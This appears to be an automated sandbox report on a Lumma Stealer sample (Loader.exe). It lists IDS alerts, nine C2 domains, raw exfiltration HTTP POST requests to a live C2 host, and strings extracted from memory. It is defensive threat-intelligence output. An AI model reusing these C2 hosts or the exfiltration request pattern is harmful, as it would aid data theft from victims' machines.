Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.11.20:49758 -> 172.67.157.249:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49762 -> 172.67.157.249:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: stingyerasjhru.click
Source: Malware configuration extractor	URLs: nearycrepso.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49762 -> 172.67.157.249:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49761 -> 172.67.157.249:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49760 -> 172.67.157.249:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49755 -> 172.67.157.249:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49757 -> 172.67.157.249:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49759 -> 172.67.157.249:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49756 -> 172.67.157.249:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49758 -> 172.67.157.249:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stingyerasjhru.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 50Host: stingyerasjhru.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HYH221AA6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20490Host: stingyerasjhru.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VS3FTQUB1ATL6UQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 10923Host: stingyerasjhru.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=633ISA4XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20510Host: stingyerasjhru.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KZ6WSVI09ZW9FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1237Host: stingyerasjhru.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=35BJGYNIRP2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1079788Host: stingyerasjhru.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 85Host: stingyerasjhru.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103081032.00000000033B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103081032.00000000033B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.comrD equals www.facebook.com (Facebook)

Source: global traffic

DNS traffic detected: DNS query: stingyerasjhru.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stingyerasjhru.click

Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103081032.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91780179524.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118614146.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778616538.00000000033B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103081032.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91780179524.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118614146.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778616538.00000000033B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118614146.00000000033B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Loader.exe, 00000003.00000003.91088526468.0000000005E79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.pki.
Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.pki.goog/gtsr100
Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
Source: Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103081032.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91780179524.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118614146.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778616538.00000000033B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
Source: Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B
Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
Source: Loader.exe, 00000003.00000003.91074970558.0000000005E65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91075395661.000000000604C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074970558.0000000005E65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Loader.exe, 00000003.00000003.91074970558.0000000005E65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
Source: Loader.exe, 00000003.00000003.91061681849.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062074801.0000000005E64000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91061837230.0000000005E64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: Loader.exe, 00000003.00000003.91061681849.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062074801.0000000005E64000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91061837230.0000000005E64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: Loader.exe, 00000003.00000003.91061681849.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062074801.0000000005E64000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91061837230.0000000005E64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: Loader.exe, 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103081032.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91780179524.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118614146.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778616538.00000000033B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pki.goog/repository/0
Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
Source: Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com
Source: Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062160822.000000000604D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com.txt
Source: Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com.txt/
Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com.txtD
Source: Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com/
Source: Loader.exe, 00000003.00000003.91062160822.000000000604D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com;
Source: Loader.exe, 00000003.00000003.91778448742.00000000033F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778448742.0000000003428000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/
Source: Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/C
Source: Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/F
Source: Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91127432350.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/Og
Source: Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91127432350.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/Rd
Source: Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/T
Source: Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91127432350.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/Vg
Source: Loader.exe, 00000003.00000003.91100553133.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/aRd
Source: Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118175734.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074354314.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91106220874.0000000003416000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91105870640.0000000003412000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/api
Source: Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/api=
Source: Loader.exe, 00000003.00000003.91781075623.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91778841405.0000000003399000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.96103019944.000000000339C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/apiC
Source: Loader.exe, 00000003.00000003.91058782608.00000000033B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/apiP
Source: Loader.exe, 00000003.00000003.91127432350.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91118175734.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/apiV
Source: Loader.exe, 00000003.00000003.91074609704.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074354314.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/apibca
Source: Loader.exe, 00000003.00000003.91118175734.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/apie
Source: Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/apintOS
Source: Loader.exe, 00000003.00000003.91100553133.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/apior
Source: Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/apiqS
Source: Loader.exe, 00000003.00000003.91100553133.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/apir
Source: Loader.exe, 00000003.00000003.91074609704.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074354314.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/apitreak
Source: Loader.exe, 00000003.00000003.91100553133.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/bxg
Source: Loader.exe, 00000003.00000003.91100553133.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/e
Source: Loader.exe, 00000003.00000003.91100553133.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/m$g
Source: Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/s
Source: Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91127432350.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/sqg
Source: Loader.exe, 00000003.00000002.96103781760.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91779621301.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91777933220.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stingyerasjhru.click/xg
Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
Source: Loader.exe, 00000003.00000003.91089795795.0000000006398000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/en-GB/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=fire
Source: Loader.exe, 00000003.00000003.91089795795.0000000006398000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/en-GB/products/firefoxgro.allizom.troppus.
Source: Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91075395661.000000000604C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074970558.0000000005E65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91075395661.000000000604C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074970558.0000000005E65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ
Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
Source: Loader.exe, 00000003.00000003.91088659221.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Loader.exe, 00000003.00000003.91062160822.000000000604D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/:
Source: Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/Download
Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/
Source: Loader.exe, 00000003.00000003.91061973141.0000000005E8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.c(om/
Source: Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062160822.000000000604D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
Source: Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062160822.000000000604D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrow
Source: Loader.exe, 00000003.00000003.91062160822.000000000603E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-n
Source: Loader.exe, 00000003.00000003.91061190974.0000000005E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: Loader.exe, 00000003.00000003.91075395661.000000000604C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91074970558.0000000005E65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Loader.exe, 00000003.00000003.91062160822.0000000006032000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.91062160822.000000000604D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=eicar
Source: Loader.exe, 00000003.00000003.91089795795.0000000006398000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/about/gro.allizom.www.
